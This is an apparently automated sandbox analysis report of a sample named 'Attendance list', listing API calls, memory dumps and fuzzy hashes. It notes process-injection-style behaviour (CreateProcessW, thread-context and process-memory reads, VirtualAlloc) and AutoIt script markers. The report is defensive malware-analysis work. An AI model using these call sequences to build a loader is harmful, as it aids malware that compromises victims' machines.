                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E82691
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E828B7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                        • Instruction ID: 174bf602c63df482617a817bb103a8606db7a6759d659bb943824638c91860ea
                        • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                        • Instruction Fuzzy Hash: 59A11674E00208EBDF14DFA4C894BEEB7B5BF48704F20955DE609BB280D7759A81DBA4

                        Control-flow Graph

                        control_flow_graph 1073 8c39e7-8c3a57 CreateWindowExW * 2 ShowWindow * 2
                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008C3A15
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C3A36
                        • ShowWindow.USER32(00000000,?,?), ref: 008C3A4A
                        • ShowWindow.USER32(00000000,?,?), ref: 008C3A53
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: 801779761ec9b7c365a0e1b4c3633f16019c64bcdda3e6e75b71cfcbdb545d36
                        • Instruction ID: cccbae7582c6ec8485860fc645a5d6c44dd5e91903d420f577cf98ddbe278158
                        • Opcode Fuzzy Hash: 801779761ec9b7c365a0e1b4c3633f16019c64bcdda3e6e75b71cfcbdb545d36
                        • Instruction Fuzzy Hash: 88F03A706652907EEA3017236C18F273E7DD7C7F51B00006AB910EA270C2A50800EBB0

                        Control-flow Graph

                        control_flow_graph 1074 e823b0-e824c0 [edge list omitted; nodes reference CreateFileW, VirtualAlloc, ReadFile, ExitProcess]
                        APIs
                          • Part of subcall function 00E822A0: Sleep.KERNELBASE(000001F4), ref: 00E822B1
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E824B6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: ST30DJL8F2G3VKNT
                        • API String ID: 2694422964-2070622328
                        • Opcode ID: f02317559908005f97d00a1ef0eebc57c355d806fbf0f5cd98eb381e9f0e8a77
                        • Instruction ID: 6689faa2c0283031d8629d73d40abe68829889e1a29ead741b45c679f12f1c6b
                        • Opcode Fuzzy Hash: f02317559908005f97d00a1ef0eebc57c355d806fbf0f5cd98eb381e9f0e8a77
                        • Instruction Fuzzy Hash: E5516E30D54249EBEF11EBA4C814BEEBBB9AF44304F104199E60CBB2C0D7790B45CBA6

                        Control-flow Graph

                        control_flow_graph 1098 8c410d-8c4123 [edge list omitted; nodes reference LoadStringW, Shell_NotifyIconW]
                        APIs
                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008FD5EC
                          • Part of subcall function 008C7D2C: _memmove.LIBCMT ref: 008C7D66
                        • _memset.LIBCMT ref: 008C418D
                        • _wcscpy.LIBCMT ref: 008C41E1
                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008C41F1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                        • String ID: Line:
                        • API String ID: 3942752672-1585850449
                        • Opcode ID: bcbe38b987fd120061a92340ce782cb6040016fb5dc4af2b896aa66f1594b7c3
                        • Instruction ID: bc21d099e7ca0ec697ae71641f8dff0829feaa5c32a12b1774a20f8ac1fd2058
                        • Opcode Fuzzy Hash: bcbe38b987fd120061a92340ce782cb6040016fb5dc4af2b896aa66f1594b7c3
                        • Instruction Fuzzy Hash: 4231AF710083059AD721EB64DC46FDA77F8FB44314F14451EB195D61A2DB74E688CB93

                        Control-flow Graph

                        control_flow_graph 1133 8e564d-8e5666 [edge list omitted; nodes reference no named API calls]
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                        • String ID:
                        • API String ID: 1559183368-0
                        • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                        • Instruction ID: 6e4c3ed0f4301c8691e9f20194b7c6b82d5a0d7fec19c68765346a032439d4cb
                        • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                        • Instruction Fuzzy Hash: 9D51B630A00B89DBDB249F7ACC8456E77A1FF52328F248729F835D62E1DB709D608B51
                        APIs
                          • Part of subcall function 008C4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008C4F6F
                        • _free.LIBCMT ref: 008FE68C
                        • _free.LIBCMT ref: 008FE6D3
                          • Part of subcall function 008C6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008C6D0D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _free$CurrentDirectoryLibraryLoad
                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                        • API String ID: 2861923089-1757145024
                        • Opcode ID: 789eabe74d950363bccaa726f7a8c9a0b6937578a44e287b658e481cb3770ca4
                        • Instruction ID: bca8443ba7cd02e8336d5364be407d05e07b2520b165fc5ecc03f76c38c14920
                        • Opcode Fuzzy Hash: 789eabe74d950363bccaa726f7a8c9a0b6937578a44e287b658e481cb3770ca4
                        • Instruction Fuzzy Hash: DC916B7191061DAFCF04EFA8C891AEDB7B4FF19314B14442EE915EB2A1EB34E944CB61
                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008C35A1,SwapMouseButtons,00000004,?), ref: 008C35D4
                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008C35A1,SwapMouseButtons,00000004,?,?,?,?,008C2754), ref: 008C35F5
                        • RegCloseKey.KERNELBASE(00000000,?,?,008C35A1,SwapMouseButtons,00000004,?,?,?,?,008C2754), ref: 008C3617
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 3677997916-824357125
                        • Opcode ID: cfc0f997f4075ae519c686bdd3df8bd78157e4551f2a44bad1300e09d87a348a
                        • Instruction ID: cc9cf4d5bed5ad9623a06a8c6f662e89926a96bea3868cc66d3c214861430719
                        • Opcode Fuzzy Hash: cfc0f997f4075ae519c686bdd3df8bd78157e4551f2a44bad1300e09d87a348a
                        • Instruction Fuzzy Hash: DD114575614208BFDB218FA4DC80EAEBBB8FF55740F018469E805E7210E272DE41ABA0
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00E81A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E81AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E81B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                        • Instruction ID: 8bc6d58c1472322620dde4e6a26db520f960832ed659c93cddb55e4317b93933
                        • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                        • Instruction Fuzzy Hash: DC620930A14258DBEB24DFA4C850BDEB376EF58304F1091A9D10DFB290E77A9E81CB59
                        APIs
                          • Part of subcall function 008C5045: _fseek.LIBCMT ref: 008C505D
                          • Part of subcall function 009299BE: _wcscmp.LIBCMT ref: 00929AAE
                          • Part of subcall function 009299BE: _wcscmp.LIBCMT ref: 00929AC1
                        • _free.LIBCMT ref: 0092992C
                        • _free.LIBCMT ref: 00929933
                        • _free.LIBCMT ref: 0092999E
                          • Part of subcall function 008E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008E9C64), ref: 008E2FA9
                          • Part of subcall function 008E2F95: GetLastError.KERNEL32(00000000,?,008E9C64), ref: 008E2FBB
                        • _free.LIBCMT ref: 009299A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                        • String ID:
                        • API String ID: 1552873950-0
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                        • String ID:
                        • API String ID: 2782032738-0
                        APIs
                        • _memset.LIBCMT ref: 008FEE62
                        • GetOpenFileNameW.COMDLG32(?), ref: 008FEEAC
                          • Part of subcall function 008C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C48A1,?,?,008C37C0,?), ref: 008C48CE
                          • Part of subcall function 008E09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008E09F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Name$Path$FileFullLongOpen_memset
                        • String ID: X
                        • API String ID: 3777226403-3081909835
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __fread_nolock_memmove
                        • String ID: EA06
                        • API String ID: 1988441806-3962188686
                        APIs
                        • GetTempPathW.KERNEL32(00000104,?), ref: 00929B82
                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00929B99
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Temp$FileNamePath
                        • String ID: aut
                        • API String ID: 3285503233-3010740371
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        APIs
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008E03D3
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008E03DB
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008E03E6
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008E03F1
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008E03F9
                          • Part of subcall function 008E03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 008E0401
                          • Part of subcall function 008D6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008CFA90), ref: 008D62B4
                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008CFB2D
                        • OleInitialize.OLE32(00000000), ref: 008CFBAA
                        • CloseHandle.KERNEL32(00000000), ref: 009049F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                        • String ID:
                        • API String ID: 1986988660-0
                        APIs
                        • _memset.LIBCMT ref: 008C4401
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008C44A6
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C44C3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: IconNotifyShell_$_memset
                        • String ID:
                        • API String ID: 1505330794-0
                        APIs
                        • __FF_MSGBANNER.LIBCMT ref: 008E5963
                          • Part of subcall function 008EA3AB: __NMSG_WRITE.LIBCMT ref: 008EA3D2
                          • Part of subcall function 008EA3AB: __NMSG_WRITE.LIBCMT ref: 008EA3DC
                        • __NMSG_WRITE.LIBCMT ref: 008E596A
                          • Part of subcall function 008EA408: GetModuleFileNameW.KERNEL32(00000000,009843BA,00000104,?,00000001,00000000), ref: 008EA49A
                          • Part of subcall function 008EA408: ___crtMessageBoxW.LIBCMT ref: 008EA548
                          • Part of subcall function 008E32DF: ___crtCorExitProcess.LIBCMT ref: 008E32E5
                          • Part of subcall function 008E32DF: ExitProcess.KERNEL32 ref: 008E32EE
                          • Part of subcall function 008E8D68: __getptd_noexit.LIBCMT ref: 008E8D68
                        • RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,00000000,?,?,?,008E1013,?), ref: 008E598F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                        • String ID:
                        • API String ID: 1372826849-0
                        APIs
                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009297D2,?,?,?,?,?,00000004), ref: 00929B45
                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009297D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00929B5B
                        • CloseHandle.KERNEL32(00000000,?,009297D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00929B62
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        APIs
                        • _free.LIBCMT ref: 00928FA5
                          • Part of subcall function 008E2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008E9C64), ref: 008E2FA9
                          • Part of subcall function 008E2F95: GetLastError.KERNEL32(00000000,?,008E9C64), ref: 008E2FBB
                        • _free.LIBCMT ref: 00928FB6
                        • _free.LIBCMT ref: 00928FC8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID:
                        • String ID: CALL
                        • API String ID: 0-4196123274
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: EA06
                        • API String ID: 4104443479-3962188686
                        APIs
                        • IsThemeActive.UXTHEME ref: 008C4992
                          • Part of subcall function 008E35AC: __lock.LIBCMT ref: 008E35B2
                          • Part of subcall function 008E35AC: DecodePointer.KERNEL32(00000001,?,008C49A7,009181BC), ref: 008E35BE
                          • Part of subcall function 008E35AC: EncodePointer.KERNEL32(?,?,008C49A7,009181BC), ref: 008E35C9
                          • Part of subcall function 008C4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008C4A73
                          • Part of subcall function 008C4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008C4A88
                          • Part of subcall function 008C3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C3B7A
                          • Part of subcall function 008C3B4C: IsDebuggerPresent.KERNEL32 ref: 008C3B8C
                          • Part of subcall function 008C3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009862F8,009862E0,?,?), ref: 008C3BFD
                          • Part of subcall function 008C3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 008C3C81
                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008C49D2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                        • String ID:
                        • API String ID: 1438897964-0
                        APIs
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,008C5981,?,?,?,?), ref: 008C5E27
                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,008C5981,?,?,?,?), ref: 008FE19C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        APIs
                          • Part of subcall function 008E594C: __FF_MSGBANNER.LIBCMT ref: 008E5963
                          • Part of subcall function 008E594C: __NMSG_WRITE.LIBCMT ref: 008E596A
                          • Part of subcall function 008E594C: RtlAllocateHeap.NTDLL(00FE0000,00000000,00000001,00000000,?,?,?,008E1013,?), ref: 008E598F
                        • std::exception::exception.LIBCMT ref: 008E102C
                        • __CxxThrowException@8.LIBCMT ref: 008E1041
                          • Part of subcall function 008E87DB: RaiseException.KERNEL32(?,?,?,0097BAF8,00000000,?,?,?,?,008E1046,?,0097BAF8,?,00000001), ref: 008E8830
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                        • String ID:
                        • API String ID: 3902256705-0
                        • Opcode ID: 91c629affc0e0a8091fe89fbed787650a4fb36988f1156491f4b39d58b2aa7bc
                        • Instruction ID: cfdd99e0310689e14fa8dec29ce25ce2a21bc59522438ca86c39b8f2b57be8c5
                        • Opcode Fuzzy Hash: 91c629affc0e0a8091fe89fbed787650a4fb36988f1156491f4b39d58b2aa7bc
                        • Instruction Fuzzy Hash: AFF08135504799A6CB20FB5AEC199DE7BA8FF03355F100425FD08E6691DFB18A848692
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __lock_file_memset
                        • String ID:
                        • API String ID: 26237723-0
                        • Opcode ID: ef18b9107aa603324e7a998e44d393759cc9ec6674010630a56531ed1557446e
                        • Instruction ID: 0745481f27b78f94b367e8f549b097fcc18c62d735afa0a4706c2bae9dc6477c
                        • Opcode Fuzzy Hash: ef18b9107aa603324e7a998e44d393759cc9ec6674010630a56531ed1557446e
                        • Instruction Fuzzy Hash: CC018871C00699EBCF12AF6F8C0559F7B61FF82764F148225F828DB1A1DB318A21DB52
                        APIs
                          • Part of subcall function 008E8D68: __getptd_noexit.LIBCMT ref: 008E8D68
                        • __lock_file.LIBCMT ref: 008E561B
                          • Part of subcall function 008E6E4E: __lock.LIBCMT ref: 008E6E71
                        • __fclose_nolock.LIBCMT ref: 008E5626
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.000000000094F000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995665390.0000000000975000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995703595.000000000097F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1995720665.0000000000988000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_8c0000_Attendance list.jbxd
                        Similarity
                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                        • String ID:
                        • API String ID: 2800547568-0
                        • Opcode ID: b9e6730d7c240b1fbc2e34bdc6d78179eb0fe8629f1cf13d0b7ef31ea86d17ae
                        • Instruction ID: b01c6ace9354e9702b467e595c1b0b647f0c180be41196f8d427bdd291faface
                        • Opcode Fuzzy Hash: b9e6730d7c240b1fbc2e34bdc6d78179eb0fe8629f1cf13d0b7ef31ea86d17ae
                        • Instruction Fuzzy Hash: 1DF09071900A85DAD721AB7F880276E67A1FF5333CF658209A428EB1D1CF7C89019B56
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00E81A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E81AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E81B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995831329.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e80000_Attendance list.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                        • Instruction ID: c0d2d40bddec31838d89f1aab4c6a5569e7ebe270b81a985d5cda7fc0f09551b
                        • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                        • Instruction Fuzzy Hash: AE12BE24E14658C6EB24DF64D8507DEB232EF68300F10A0E9D10DEB7A5E77A4F81CB5A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1995617587.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                        • Associated: 00000000.00000002.1995605018.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
